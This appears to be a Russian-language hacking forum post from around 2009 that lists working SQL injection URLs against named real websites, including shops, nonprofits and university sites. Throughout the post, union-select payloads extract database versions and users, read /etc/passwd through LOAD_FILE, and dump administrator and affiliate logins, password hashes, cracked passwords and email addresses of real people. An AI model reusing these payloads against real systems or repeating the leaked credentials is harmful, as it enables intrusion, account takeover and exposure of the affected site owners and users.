|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Онлайншопер на Постгри -)
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,version(),null,null,null,null,null,null--
PostgreSQL 7.4.2 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.2 20031022 (Red Hat Linux 3.3.2-1)
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,table_name,null,null,null,null,null,null+from+INF ORMATION_SCHEMA.TABLES--
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,COLUMN_NAME,null,null,null,null,null,null+from+IN FORMATION_SCHEMA.columns--
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,password,null,null,null,null,null,null+from+membe rs--
Username: admin Password : 321roy
Красотой не пахнет но пойдёт и так =)
VIAHOST - Надёжный хостинг -) гы улыбнуло
http://support.via.su/user.php?Category_ID=5/**/union/**/select/**/1,2,3,concat_ws(0x3a,user(),version(),database()), 5,6,7,8,9,10,11,12--&op=opCategoryThreadsShow&_lform=0&_id=16242475679 1014
User:extreem_root@localhost
Version:4.1.22
Database:FineBill
Еще один Шопер,но не раскурутил
Какая то муть с выводом в сипте.
http://www.moca.org/store/product_detail.php?pID=89796986986312+union+select +1,2,concat_ws(0x3a,user(),version(),database()),4 ,5,6,7,8,9,10--
User:moca@localhost
Version:5.0.24
Database:moca
http://www.lloyd.de/en/service/news.php?page=1&article_id=168768765400+union+sele ct+1,2,3,4,concat_ws(0x3a,user(),version(),databas e()),6,7,8--
User: dbo40336812@212.227.119.25
Version: 4.0.27-max-log
Database: db40336812
http://www.billsizemore.com/article.php?article_id=105679860+union+select+1,2, concat_ws(0x3a,user(),version(),database())--&category_id=3
User: sizemore_webuser@localhost
Version: 4.1.22-standard
Database: sizemore_sizemore
http://umixit.com/news/article_view.html?article_id=100987809760+union+se lect+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version() ,database()),9,10,11,12,13,14--
User: umixit2_website2@localhost
Version: 4.1.21-standard
Database:umixit2_website2
http://www.securitymanagement.com.au/article.php?action=view&article_id=123467834200+un ion+select+1,2,3,4,concat_ws(0x3a,user(),version() ,database()),6,7,8,9,10,11,12
Database Version: 5.0.37
Database name: securitymgmt
User name: securitymgmt@203.31.82.10
Достаём логин пасс
http://www.securitymanagement.com.au/article.php?action=view&article_id=123467834200+UN ION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT( (SELECT+CONCAT(username,pass)+FROM+securitymgmt.us ers+LIMIT+1,1)),0x71),0x71),6,7,8,9,10,11,12--
gordon : 7a1ad597a3a5fb9234eac26112fb1ffddc6bb6ff
http://www.greateryuma.org/articles/article_view.html?article_id=169807987960+union+se lect+concat_ws(0x3a,user(),version(),database()),2 ,3,4,5,6,7,8,9,10,11--
User: yumaedc_website@localhost
Version: 4.1.22-standard
Database:yumaedc_website
http://www.awctechprep.org/news/article_view.html?article_id=128097656+union+selec t+1,2,3,4,concat_ws(0x3a,user(),version(),database ()),6,7,8,9,10,11,12,13--
awc_techprep@localhost
4.1.20
awc_techprep
http://www.bniyuma.com/members/business_detail.html?id=5886876588+union+select+co ncat_ws(0x3a,user(),version(),database()),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--&where_clause=
bniyuma@localhost
4.0.20
bniyuma
http://www.mitratech.com/about/details.php?article_id=106969540+union+select+1,2, concat_ws(0x3a,user(),version(),database()),4,5,6, 7,8,9,10,11,12,13--
User: db12266@10.1.3.31
Version: 4.1.25-Debian_mt1
Database: db12266_mitratech
тИЦ = 180
PageRank = 6
http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+union+select+1,co ncat_ws(0x3a,user(),version(),database())--
Database Version: 4.1.11-standard-log
Database name: whatsnew
User name: root@localhost
http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+UNION+SELECT+1,AE S_DECRYPT(AES_ENCRYPT(CONCAT(User,password),0x71), 0x71)+from+mysql.user+limit+7,1--
cmcgregor *125D791AB19AF8FD7F6B37B237038173D8DA5212
root *1CDFA4599A44CBA9CA969BA03E4F9079CD67771D
astle *95024238F421F27A07155A3267C6925D1B5D54E9 хэш MySQL5 : 95024238f421f27a07155a3267c6925d1b5d54e9:hemlock
repl *A424E797037BF97C19A2E88CF7891C5C2038C039 хэш MySQL5 : a424e797037bf97c19a2e88cf7891c5c2038c039:repl
brandon
rlyon *D7624E368C73DB8F2AD8747C90AEC4EC47BCA359
replicator *0EFECFE5946B7B520BE8C6380DEEAD0DC720FB28
wales *3CBD789A278AEABB649633E18D6C7E28EEED5A77 хэш MySQL5 : 3cbd789a278aeabb649633e18d6c7e28eeed5a77:wales
Читалка файлов -)
http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+UNION+SELECT+1,AE S_DECRYPT(AES_ENCRYPT(CONCAT(LOAD_FILE(0x2F6574632 F706173737764)),0x71),0x71)--
Ну и дальше дело техники -)
Ну и .edu на последок -)
тИЦ = 500
PageRank = 7
http://info.med.yale.edu/calendar/detailview.php3?event_id=547897699030+union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,c oncat_ws(0x3a,user(),version(),database()),21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67--&calendar_id=1&timeframe=ThisWeek&num_days=&pal m=
User:ysm_calendar@web.med.yale.edu
Version:4.0.24-log
Database:ysm_calendar
http://www.azwestern.edu/news/article_view.html?article_id=12798654333+union+sel ect+1,2,3,4,5,concat_ws(0x3a,user(),version(),data base()),7,8,9,10,11,12--
awc_website@localhost
4.1.20
awc_website
Разработчики сих ошибок
http://www.mgmdesign.com/portfolio.html
параметр : article_view.html?article_id=1+скуля+
Всё спать надо.
Поспал блин -)
Еще один онлайншопинг -)
PR 5
База здоровая
http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+union+select+1 ,concat_ws(0x3a,user(),version(),database()),3--
Database Version: 5.0.26-log
Database name: musichri_database
User name: mcis_wbusr@10.0.90.131
http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(0x3 a,user,0x3a,pass,0x3a,email)+FROM+musichri_databas e.12all_admin+LIMIT+1,1)),0x71),0x71),3--
Админчики
:daniel:djJsaXN0c2FkbWlu:daniel@musichristian.com :
 eroro:: :
:jeff.cooley:ZHRib3kyNjIw:jeff.cooley@musicountry. com :
Еще пользователи
http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCA T(username,0x3a,password,0x3a,email)+FROM+musichri _database.affiliate_user+LIMIT+200,1),0x3a),0x71), 0x71),3--
:mcstores:4bedb00c:john.varghese@musichristian.com
:_sitening_:sitening:mcbc@sitening.com
итд...
В общем по базе там надо смотреть так как там заказов более 100000 да и вообще я так понял это старый уже магазин.
Хотя мож и не магазин а партнёрка вроде бы нет...
Последний раз редактировалось spherics; 26.01.2009 в 05:44..
|